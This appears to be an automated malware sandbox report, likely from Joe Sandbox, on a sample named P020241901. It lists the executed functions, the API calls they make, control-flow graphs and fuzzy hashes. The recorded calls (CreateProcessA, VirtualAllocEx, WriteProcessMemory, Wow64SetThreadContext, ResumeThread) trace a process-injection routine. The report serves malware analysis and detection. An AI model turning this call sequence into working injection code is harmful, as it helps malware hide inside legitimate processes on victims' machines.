VirtualAllocEx 34542->34543 34545 6ed4a05 34543->34545 34545->34450 34547 6ed4b83 ReadProcessMemory 34546->34547 34549 6ed4bc7 34547->34549 34549->34473 34551 6ed4b83 ReadProcessMemory 34550->34551 34553 6ed4bc7 34551->34553 34553->34473 34555 6ed4840 ResumeThread 34554->34555 34557 6ed4871 34555->34557 34557->34491 34559 6ed4840 ResumeThread 34558->34559 34561 6ed4871 34559->34561 34561->34491 34563 6ed4d59 CreateProcessA 34562->34563 34565 6ed4f1b 34563->34565 34567 6ed4d59 CreateProcessA 34566->34567 34569 6ed4f1b 34567->34569 34570 97d0f8 34571 97d13e 34570->34571 34575 97d2c9 34571->34575 34578 97d2d8 34571->34578 34572 97d22b 34576 97d306 34575->34576 34581 97c9e0 34575->34581 34576->34572 34579 97c9e0 DuplicateHandle 34578->34579 34580 97d306 34579->34580 34580->34572 34582 97d340 DuplicateHandle 34581->34582 34583 97d3d6 34582->34583 34583->34576 34584 97ad78 34588 97ae70 34584->34588 34596 97ae60 34584->34596 34585 97ad87 34589 97ae81 34588->34589 34590 97aea4 34588->34590 34589->34590 34604 97b0f8 34589->34604 34608 97b108 34589->34608 34590->34585 34591 97ae9c 34591->34590 34592 97b0a8 GetModuleHandleW 34591->34592 34593 97b0d5 34592->34593 34593->34585 34597 97ae81 34596->34597 34599 97aea4 34596->34599 34597->34599 34602 97b0f8 LoadLibraryExW 34597->34602 34603 97b108 LoadLibraryExW 34597->34603 34598 97ae9c 34598->34599 34600 97b0a8 GetModuleHandleW 34598->34600 34599->34585 34601 97b0d5 34600->34601 34601->34585 34602->34598 34603->34598 34605 97b11c 34604->34605 34606 97b141 34605->34606 34612 97a8b0 34605->34612 34606->34591 34609 97b11c 34608->34609 34610 97b141 34609->34610 34611 97a8b0 LoadLibraryExW 34609->34611 34610->34591 34611->34610 34613 97b2e8 LoadLibraryExW 34612->34613 34615 97b361 34613->34615 34615->34606 34675 974668 34676 97467a 34675->34676 34677 974686 34676->34677 34679 974778 34676->34679 34680 97479d 34679->34680 34684 974888 34680->34684 34688 974878 34680->34688 34686 9748af 34684->34686 34685 97498c 34685->34685 34686->34685 34692 974248 34686->34692 34690 9748af 34688->34690 34689 97498c 34689->34689 34690->34689 34691 974248 CreateActCtxA 34690->34691 34691->34689 34693 975918 CreateActCtxA 34692->34693 34695 9759db 34693->34695

                                  Executed Functions

                                  Function 04A96CC8 Relevance: .8, Instructions: 778COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2012790551.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_4a90000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 331669c5db75351fd39c6efd97fbf2abdf67e9a8f8e8705dfacd81176d7b483e
                                  • Instruction ID: aa2d0e86294172da6f11b0ab2cb828e0ea9c1dcb8b84df16e96a81891b001c11
                                  • Opcode Fuzzy Hash: 331669c5db75351fd39c6efd97fbf2abdf67e9a8f8e8705dfacd81176d7b483e
                                  • Instruction Fuzzy Hash: B272F574A11219CFDB24DF68C990B9EB7B2BF89301F1085E9D409AB365DB30AE85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04A96CB9 Relevance: .7, Instructions: 670COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2012790551.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_4a90000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 86dbb427bfb1a29e8489dee9bb0403ba4fecf1d19915b4ada1bb2a8ae9c6a383
                                  • Instruction ID: 60f44f82821bf3e1ec62c75c71d4117d340e77cbfac66ea688f3871c4321735f
                                  • Opcode Fuzzy Hash: 86dbb427bfb1a29e8489dee9bb0403ba4fecf1d19915b4ada1bb2a8ae9c6a383
                                  • Instruction Fuzzy Hash: 6B62D434A11219CFDB24DF64C990B9EB7B2BF89305F1085EAD509AB364DB34AE85CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06ED4CC4 Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 493 6ed4cc4-6ed4d65 495 6ed4d9e-6ed4dbe 493->495 496 6ed4d67-6ed4d71 493->496 503 6ed4df7-6ed4e26 495->503 504 6ed4dc0-6ed4dca 495->504 496->495 497 6ed4d73-6ed4d75 496->497 498 6ed4d98-6ed4d9b 497->498 499 6ed4d77-6ed4d81 497->499 498->495 501 6ed4d85-6ed4d94 499->501 502 6ed4d83 499->502 501->501 505 6ed4d96 501->505 502->501 510 6ed4e5f-6ed4f19 CreateProcessA 503->510 511 6ed4e28-6ed4e32 503->511 504->503 506 6ed4dcc-6ed4dce 504->506 505->498 508 6ed4df1-6ed4df4 506->508 509 6ed4dd0-6ed4dda 506->509 508->503 512 6ed4ddc 509->512 513 6ed4dde-6ed4ded 509->513 524 6ed4f1b-6ed4f21 510->524 525 6ed4f22-6ed4fa8 510->525 511->510 514 6ed4e34-6ed4e36 511->514 512->513 513->513 515 6ed4def 513->515 516 6ed4e59-6ed4e5c 514->516 517 6ed4e38-6ed4e42 514->517 515->508 516->510 519 6ed4e44 517->519 520 6ed4e46-6ed4e55 517->520 519->520 520->520 521 6ed4e57 520->521 521->516 524->525 535 6ed4fb8-6ed4fbc 525->535 536 6ed4faa-6ed4fae 525->536 538 6ed4fcc-6ed4fd0 535->538 539 6ed4fbe-6ed4fc2 535->539 536->535 537 6ed4fb0 536->537 537->535 541 6ed4fe0-6ed4fe4 538->541 542 6ed4fd2-6ed4fd6 538->542 539->538 540 6ed4fc4 539->540 540->538 543 6ed4ff6-6ed4ffd 541->543 544 6ed4fe6-6ed4fec 541->544 542->541 545 6ed4fd8 542->545 546 6ed4fff-6ed500e 543->546 547 6ed5014 543->547 544->543 545->541 546->547 549 6ed5015 547->549 549->549
                                  APIs
                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06ED4F06
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: ae1dc705f01577a95f04567bcc0cc834795cee5f9c505f957d1174349391db17
                                  • Instruction ID: 87ad74966c45e67cf36e573fa5c72c725eacc9f6b676a759153a1143f7a18ff4
                                  • Opcode Fuzzy Hash: ae1dc705f01577a95f04567bcc0cc834795cee5f9c505f957d1174349391db17
                                  • Instruction Fuzzy Hash: AF916B71D00319DFDB64DF68C840BEEBAF2BF48314F1485A9E808A7294DB749986CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06ED4CD0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 550 6ed4cd0-6ed4d65 552 6ed4d9e-6ed4dbe 550->552 553 6ed4d67-6ed4d71 550->553 560 6ed4df7-6ed4e26 552->560 561 6ed4dc0-6ed4dca 552->561 553->552 554 6ed4d73-6ed4d75 553->554 555 6ed4d98-6ed4d9b 554->555 556 6ed4d77-6ed4d81 554->556 555->552 558 6ed4d85-6ed4d94 556->558 559 6ed4d83 556->559 558->558 562 6ed4d96 558->562 559->558 567 6ed4e5f-6ed4f19 CreateProcessA 560->567 568 6ed4e28-6ed4e32 560->568 561->560 563 6ed4dcc-6ed4dce 561->563 562->555 565 6ed4df1-6ed4df4 563->565 566 6ed4dd0-6ed4dda 563->566 565->560 569 6ed4ddc 566->569 570 6ed4dde-6ed4ded 566->570 581 6ed4f1b-6ed4f21 567->581 582 6ed4f22-6ed4fa8 567->582 568->567 571 6ed4e34-6ed4e36 568->571 569->570 570->570 572 6ed4def 570->572 573 6ed4e59-6ed4e5c 571->573 574 6ed4e38-6ed4e42 571->574 572->565 573->567 576 6ed4e44 574->576 577 6ed4e46-6ed4e55 574->577 576->577 577->577 578 6ed4e57 577->578 578->573 581->582 592 6ed4fb8-6ed4fbc 582->592 593 6ed4faa-6ed4fae 582->593 595 6ed4fcc-6ed4fd0 592->595 596 6ed4fbe-6ed4fc2 592->596 593->592 594 6ed4fb0 593->594 594->592 598 6ed4fe0-6ed4fe4 595->598 599 6ed4fd2-6ed4fd6 595->599 596->595 597 6ed4fc4 596->597 597->595 600 6ed4ff6-6ed4ffd 598->600 601 6ed4fe6-6ed4fec 598->601 599->598 602 6ed4fd8 599->602 603 6ed4fff-6ed500e 600->603 604 6ed5014 600->604 601->600 602->598 603->604 606 6ed5015 604->606 606->606
                                  APIs
                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06ED4F06
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 431b707a8b11ca8d94be6636fc4c13f10c7971a11458284451ac555f6bb51e73
                                  • Instruction ID: 03bd19e8b50a9f4e1dd0fc793ec98b2793a7658d30e80d2df671e7a3dee1149f
                                  • Opcode Fuzzy Hash: 431b707a8b11ca8d94be6636fc4c13f10c7971a11458284451ac555f6bb51e73
                                  • Instruction Fuzzy Hash: 30917A71D00319CFDB64DF68C840BAEBBF2BF48304F1485A9E808A7294DB749986CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0097AE70 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 607 97ae70-97ae7f 608 97ae81-97ae8e call 979878 607->608 609 97aeab-97aeaf 607->609 616 97aea4 608->616 617 97ae90 608->617 611 97aec3-97af04 609->611 612 97aeb1-97aebb 609->612 618 97af06-97af0e 611->618 619 97af11-97af1f 611->619 612->611 616->609 662 97ae96 call 97b0f8 617->662 663 97ae96 call 97b108 617->663 618->619 620 97af43-97af45 619->620 621 97af21-97af26 619->621 626 97af48-97af4f 620->626 623 97af31 621->623 624 97af28-97af2f call 97a854 621->624 622 97ae9c-97ae9e 622->616 625 97afe0-97b0a0 622->625 628 97af33-97af41 623->628 624->628 657 97b0a2-97b0a5 625->657 658 97b0a8-97b0d3 GetModuleHandleW 625->658 629 97af51-97af59 626->629 630 97af5c-97af63 626->630 628->626 629->630 631 97af65-97af6d 630->631 632 97af70-97af79 call 97a864 630->632 631->632 638 97af86-97af8b 632->638 639 97af7b-97af83 632->639 640 97af8d-97af94 638->640 641 97afa9-97afad 638->641 639->638 640->641 643 97af96-97afa6 call 97a874 call 97a884 640->643 646 97afb3-97afb6 641->646 643->641 647 97afd9-97afdf 646->647 648 97afb8-97afd6 646->648 648->647 657->658 659 97b0d5-97b0db 658->659 660 97b0dc-97b0f0 658->660 659->660 662->622 663->622
                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0097B0C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000651487.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_970000_P020241901.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 8ae84b510d7024248ef9e9df9e2eb7cf506b15be35172b9752a0ab9ffb0f0e22
                                  • Instruction ID: 9f56c5b49ac51bee73c92aae103f5bdc788b2c94451feced9a938b211aa64a09
                                  • Opcode Fuzzy Hash: 8ae84b510d7024248ef9e9df9e2eb7cf506b15be35172b9752a0ab9ffb0f0e22
                                  • Instruction Fuzzy Hash: 6A7157B1A00B058FD724DF2AD44079ABBF5FF88304F10892DE48AD7A50DB75E945CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04A90BFC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 772 4a90bfc-4a942fc 775 4a943ac-4a943cc call 4a90ad4 772->775 776 4a94302-4a94307 772->776 783 4a943cf-4a943dc 775->783 778 4a94309-4a94340 776->778 779 4a9435a-4a94392 CallWindowProcW 776->779 786 4a94349-4a94358 778->786 787 4a94342-4a94348 778->787 780 4a9439b-4a943aa 779->780 781 4a94394-4a9439a 779->781 780->783 781->780 786->783 787->786
                                  APIs
                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 04A94381
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2012790551.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_4a90000_P020241901.jbxd
                                  Similarity
                                  • API ID: CallProcWindow
                                  • String ID:
                                  • API String ID: 2714655100-0
                                  • Opcode ID: 04bff17d2c4c101c58b750ce16871be6637f76baa520fbdd7f2647f82edbc058
                                  • Instruction ID: 925395458613bc0dead7e80610edd88ce61c974c84c0c26e91259f6f52330d7f
                                  • Opcode Fuzzy Hash: 04bff17d2c4c101c58b750ce16871be6637f76baa520fbdd7f2647f82edbc058
                                  • Instruction Fuzzy Hash: 874156B4A04309DFDB04DF99C488AABBBF5FF88314F24C459D519AB321D374A841CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00974248 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 789 974248-9759d9 CreateActCtxA 792 9759e2-975a3c 789->792 793 9759db-9759e1 789->793 800 975a3e-975a41 792->800 801 975a4b-975a4f 792->801 793->792 800->801 802 975a51-975a5d 801->802 803 975a60 801->803 802->803 805 975a61 803->805 805->805
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 009759C9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000651487.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_970000_P020241901.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: bd44db253426763263a9f3651753713b208fafbc7b63476b9f76a4e55d838b5e
                                  • Instruction ID: e07edd9e0138ac9586d620dbd6d702f327aac4cdd1605afc5fe8eb0e9fa08a38
                                  • Opcode Fuzzy Hash: bd44db253426763263a9f3651753713b208fafbc7b63476b9f76a4e55d838b5e
                                  • Instruction Fuzzy Hash: EE41D1B1C0071DCBDB24DFA9C884B9EBBB5FF49304F20816AD408AB255DBB56945CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0097590C Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 806 97590c-975913 807 97591c-9759d9 CreateActCtxA 806->807 809 9759e2-975a3c 807->809 810 9759db-9759e1 807->810 817 975a3e-975a41 809->817 818 975a4b-975a4f 809->818 810->809 817->818 819 975a51-975a5d 818->819 820 975a60 818->820 819->820 822 975a61 820->822 822->822
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 009759C9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000651487.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_970000_P020241901.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 43c68a796276f4425cd8754d07697e3df93ddf083c70447fbf8a391fc53bf82d
                                  • Instruction ID: 802b0112ad9fa29d67d03b87b68c3012fb8c02b6c826ffb1939f7312ad5f848f
                                  • Opcode Fuzzy Hash: 43c68a796276f4425cd8754d07697e3df93ddf083c70447fbf8a391fc53bf82d
                                  • Instruction Fuzzy Hash: 5F410FB1C00619CBDB24DFA9C98479DBBB5FF48304F20806AC418AB265DBB56946CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06ED4A40 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 823 6ed4a40-6ed4a96 826 6ed4a98-6ed4aa4 823->826 827 6ed4aa6-6ed4ae5 WriteProcessMemory 823->827 826->827 829 6ed4aee-6ed4b1e 827->829 830 6ed4ae7-6ed4aed 827->830 830->829
                                  APIs
                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06ED4AD8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: aa4c23bb0c653140aaa39b0514e357c8593e1ac56c1d07260fde487a63f6fabf
                                  • Instruction ID: fef7815d4713d0663d6cb68d9e8e14eac75c2147d802e50c47b1f79fa2f5b418
                                  • Opcode Fuzzy Hash: aa4c23bb0c653140aaa39b0514e357c8593e1ac56c1d07260fde487a63f6fabf
                                  • Instruction Fuzzy Hash: 582146B1900309DFCB10DFAAC885BEEBBF1FF48310F10842AE959A7240D7789945CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06ED4A48 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 834 6ed4a48-6ed4a96 836 6ed4a98-6ed4aa4 834->836 837 6ed4aa6-6ed4ae5 WriteProcessMemory 834->837 836->837 839 6ed4aee-6ed4b1e 837->839 840 6ed4ae7-6ed4aed 837->840 840->839
                                  APIs
                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06ED4AD8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 5626f45e0f0cfb14c020f0cae52acf0f31d9e72ebbefa4e543b033faec5882eb
                                  • Instruction ID: 5778956d9eba0df0717e86b3039b3e55338513c3dc94004e7b8c0f030c21bb49
                                  • Opcode Fuzzy Hash: 5626f45e0f0cfb14c020f0cae52acf0f31d9e72ebbefa4e543b033faec5882eb
                                  • Instruction Fuzzy Hash: 0C212A71900349DFCB10DFAAC945BEEBBF5FF48310F108429E919A7240D7789944CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06ED48A8 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 844 6ed48a8-6ed48fb 846 6ed48fd-6ed4909 844->846 847 6ed490b-6ed493b Wow64SetThreadContext 844->847 846->847 849 6ed493d-6ed4943 847->849 850 6ed4944-6ed4974 847->850 849->850
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06ED492E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 37e65a2272d39c677e7c9eed1c549393209f4bbd0e909ec992955dd2af282d84
                                  • Instruction ID: 781b11b3a58043bbe4650f6de5f8b46a0885a26681bc649c39b4832a91bf622f
                                  • Opcode Fuzzy Hash: 37e65a2272d39c677e7c9eed1c549393209f4bbd0e909ec992955dd2af282d84
                                  • Instruction Fuzzy Hash: CC2159B1D003098FDB50DFAAC5857EEBBF4EF58314F50842AD459A7280C7789545CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0097C9E0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                  Download Yara Rule
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0097D306,?,?,?,?,?), ref: 0097D3C7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000651487.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_970000_P020241901.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 87b69b89ce4a5c0acbb38a78cf3e6ef4d7d5c1bb1ff2d7f30f8b90dd74df9cc6
                                  • Instruction ID: 337309f730fbf20bac916dd9d406d7fe479733fd81b113887849546eaea0ea23
                                  • Opcode Fuzzy Hash: 87b69b89ce4a5c0acbb38a78cf3e6ef4d7d5c1bb1ff2d7f30f8b90dd74df9cc6
                                  • Instruction Fuzzy Hash: B52103B5900208AFDB10CF9AD484AEEBBF8FF48314F14841AE918A3350D378A940CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06ED4B38 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                  Download Yara Rule
                                  APIs
                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06ED4BB8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: 43b5fe30437b576f4e4e916e7363006b809581741bfd75da2ee581ff631bc3f9
                                  • Instruction ID: bc7e2aab0bcb85d83fcfed1b901cd469c569957c614598f7b9682850b6883011
                                  • Opcode Fuzzy Hash: 43b5fe30437b576f4e4e916e7363006b809581741bfd75da2ee581ff631bc3f9
                                  • Instruction Fuzzy Hash: A42125B1C003499FCB10DFAAC881AEEBBF5FF48310F50842AE519A7250C779A940CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06ED4B36 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                  Download Yara Rule
                                  APIs
                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06ED4BB8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: d303219c5e4b6ab157837a4ef50cb9f0de27930d8492d8a4ff924e57c60370ff
                                  • Instruction ID: b428000b9e1433282ee3617f9e0ee6c6338d9cd5f508769c0e0a48e32810c183
                                  • Opcode Fuzzy Hash: d303219c5e4b6ab157837a4ef50cb9f0de27930d8492d8a4ff924e57c60370ff
                                  • Instruction Fuzzy Hash: F62134B1C00349DFCB10DFAAC880AEEBBF5FF48310F10842AE519A7290C7399941CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06ED48B0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06ED492E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: e67775b53ce0aad1d02d9739920d84dcd7ab7af13d87276cceff7b8e610ad29a
                                  • Instruction ID: 2cf5469e9d939c8f45724de13a52660e553169779ee9faf87adfdc7e08a6c5e9
                                  • Opcode Fuzzy Hash: e67775b53ce0aad1d02d9739920d84dcd7ab7af13d87276cceff7b8e610ad29a
                                  • Instruction Fuzzy Hash: 232149B1D003098FDB10DFAAC5857EEBBF4EF48324F10842AD559A7240CB78A945CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0097D338 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                  Download Yara Rule
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0097D306,?,?,?,?,?), ref: 0097D3C7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000651487.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_970000_P020241901.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: c11e7523639ac4110f638530a691ba027cf8b63afc9266a7f63119b5c3fb7b27
                                  • Instruction ID: 84b107c8270a155d736ac1fc345b156a61ae980a563dae0f05f9827352fa6160
                                  • Opcode Fuzzy Hash: c11e7523639ac4110f638530a691ba027cf8b63afc9266a7f63119b5c3fb7b27
                                  • Instruction Fuzzy Hash: 9D21E3B5901248DFDB10CFAAD584AEEBBF9FF48314F14841AE918A7350D378A940CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06ED4980 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06ED49F6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: f2b63e79df638f5f36b113195c1d448ec930fcb2a1d1bde0140024deb46366a3
                                  • Instruction ID: ba635442d8d4d246ea03ffc7ae877ca994ed700d0a46af7db08cc34509b72973
                                  • Opcode Fuzzy Hash: f2b63e79df638f5f36b113195c1d448ec930fcb2a1d1bde0140024deb46366a3
                                  • Instruction Fuzzy Hash: AA1129718002499FDB20DFAAC8456EFBFF5EF48310F208419D559A7250C7759545CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0097A8B0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0097B141,00000800,00000000,00000000), ref: 0097B352
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000651487.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_970000_P020241901.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 63e5a56f4343d9e30c59933b6cac486711d17ca70588a2bc35a94dd2e2935894
                                  • Instruction ID: 12b46ff6776e9dce460d120346219f2c5bb08949fff31af960c7b98d42870bdb
                                  • Opcode Fuzzy Hash: 63e5a56f4343d9e30c59933b6cac486711d17ca70588a2bc35a94dd2e2935894
                                  • Instruction Fuzzy Hash: 3B1114B68003499FDB10DF9AC448BAEFBF8EB48310F10842AD519A7210C379A945CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0097B2E0 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0097B141,00000800,00000000,00000000), ref: 0097B352
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000651487.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_970000_P020241901.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
